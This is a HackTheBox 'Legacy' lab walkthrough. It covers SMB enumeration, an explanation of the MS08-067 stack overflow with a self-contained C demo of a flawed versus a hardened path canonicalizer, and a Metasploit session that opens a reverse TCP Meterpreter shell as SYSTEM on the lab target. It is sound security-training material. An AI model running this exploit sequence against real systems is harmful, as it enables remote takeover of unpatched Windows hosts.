HackTheBox: Legacy

01/13/2024

This is the second retired Windows box I'll be doing, after [[Blue]]. I'm shamelessly following writeups and Guided mode just to get as much exposure as I can in as little time as possible, as a crash course of sorts. Once I'm more comfortable with this OS I'll do more boxes on my own.

Enumeration

Three ports are open per nmap:

1) msrpc on 135
2) netbios-ssn on 139
3) microsoft-ds on 445

The script scan gives us a few pieces of useful information. Less significantly, the hostname is legacy.

More significantly, it reveals some useful details about the SMB server on 139. First, the workgroup name is HTB. Second, anonymous (null session) login is allowed. Note that an accepted null session only means the server lets you authenticate as nobody; it says nothing yet about whether shares can be listed or read.

Enumerating SMB (netbios-ssn)

I'll use impacket-smbclient to connect to the SMB server:


$ impacket-smbclient 10.10.10.4

# login
[*] USER Session Granted

# shares
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

huh...

I'm not spending a lot of time floundering around like a beached fish here. I'm just going to use the writeup, since I know fuck all about Binbows BP.

The writeup deduced from the nmap scan that the box might be vulnerable to CVE-2008-4250 (MS08-067), which has a Metasploit module. The likely tell is the OS fingerprint: the same smb-os-discovery script that reported the hostname and workgroup also reports the OS, and an unpatched Windows XP SP3 host exposing 445 is the textbook MS08-067 target (Metasploit's own fingerprint below confirms XP SP3). The vulnerability is an RCE caused by a stack buffer overflow in the Server service's path canonicalization routine (NetPathCanonicalize in netapi32.dll), reachable through an RPC call over SMB that needs no credentials, which is why a null session is all an attacker needs. Nmap's smb-vuln-ms08-067 NSE script can confirm the bug before exploiting, but its own documentation warns that the check can crash the target, so on anything that matters you would verify the patch level instead.
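To make the bug class concrete, here is an added example of my own (a simplified model, not the code of netapi32.dll, the Metasploit module, or the writeup). It models a path canonicalizer that collapses "dir\..\" sequences, in a flawed form that backs the write cursor up on every ".." without checking that it is still inside the output buffer, next to a hardened form that refuses to pop past the start. The struct layout, the guard bytes standing in for the saved return address, and the sample paths are all constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

#define GUARD  8          /* bytes that sit just below the output buffer */
#define OUTLEN 64

/* One contiguous region [guard | out]; a cursor that underflows out lands in
 * guard, so the demo stays inside the array and is well-defined C. */
struct frame { char mem[GUARD + OUTLEN]; };

static void frame_init(struct frame *f)
{
    /* The guard is filled with separators so the flawed backward scan stops
     * after exactly one byte per excess "..": deterministic for the demo. A
     * real stack frame holds saved registers and a return address instead. */
    memset(f->mem, '\\', GUARD);
    memset(f->mem + GUARD, 0, OUTLEN);
}

static const char *frame_out(const struct frame *f) { return f->mem + GUARD; }

/* 1 if any byte below the output buffer was changed, i.e. the cursor underflowed. */
static int guard_corrupted(const struct frame *f)
{
    for (int i = 0; i < GUARD; i++)
        if (f->mem[i] != '\\') return 1;
    return 0;
}

/* Copy the next '\'-delimited component of *p into comp and advance past it. */
static size_t next_component(const char **p, char *comp, size_t max)
{
    size_t n = 0;
    while (**p && **p != '\\') {
        if (n + 1 < max) comp[n++] = **p;
        (*p)++;
    }
    comp[n] = '\0';
    if (**p == '\\') (*p)++;
    return n;
}

/* Collapse "dir\..\" in path into the frame's output buffer (prefix form, so
 * "\a\b\..\c" becomes "\a\c"). hardened selects the lower-bound check on "..".
 * Returns 0 on success, -1 if the path is rejected. */
static int canonicalize(const char *path, struct frame *f, int hardened)
{
    char *out = f->mem + GUARD, *w = out;
    const char *p = path;
    char comp[OUTLEN];

    if (*p == '\\') p++;
    while (*p) {
        size_t n = next_component(&p, comp, sizeof comp);
        if (n == 0 || strcmp(comp, ".") == 0)
            continue;                               /* "\\" and "." are no-ops */
        if (strcmp(comp, "..") == 0) {
            if (hardened) {
                if (w == out) return -1;            /* nothing to pop: reject */
                w--;
                while (w > out && *w != '\\') w--;
            } else {
                /* BUG: no lower bound. With nothing left to pop, the cursor
                 * walks below out into whatever precedes the buffer. */
                w--;
                while (*w != '\\') w--;
            }
            continue;
        }
        if (w + 1 + n >= out + OUTLEN) return -1;  /* ordinary far-end check */
        *w++ = '\\';
        memcpy(w, comp, n);
        w += n;
    }
    *w = '\0';
    return 0;
}

/* Drivers for the three cases; each returns 1 if the described behaviour is observed. */
static int benign_path_is_collapsed(void)          /* "\a\b\..\c" -> "\a\c" */
{
    struct frame f; frame_init(&f);
    return canonicalize("\\a\\b\\..\\c", &f, 0) == 0
        && strcmp(frame_out(&f), "\\a\\c") == 0 && !guard_corrupted(&f);
}

static int flawed_version_underflows(void)         /* "x" lands below the buffer */
{
    struct frame f; frame_init(&f);
    return canonicalize("\\..\\..\\x", &f, 0) == 0 && guard_corrupted(&f);
}

static int hardened_version_rejects(void)          /* same input, guard untouched */
{
    struct frame f; frame_init(&f);
    return canonicalize("\\..\\..\\x", &f, 1) == -1 && !guard_corrupted(&f);
}

int main(void)
{
    printf("benign path collapsed:     %d\n", benign_path_is_collapsed());
    printf("flawed version underflows: %d\n", flawed_version_underflows());
    printf("hardened version rejects:  %d\n", hardened_version_rejects());
    return 0;
}
```

The point of the demo is the second case: with more ".." components than real ones, the flawed loop has no reason to stop at the start of the buffer, and the attacker's next component is written into memory the function does not own. In the real service that memory is the stack frame, which is what lets the Metasploit module turn a malformed path into code execution as SYSTEM.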

Exploiting CVE-2008-4250


msf6 > use exploit/windows/smb/ms08_067_netapi 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4

msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.24
LHOST => 10.10.14.24

msf6 exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 10.10.14.24:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.4:1035) at 2023-10-13 16:29:49 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM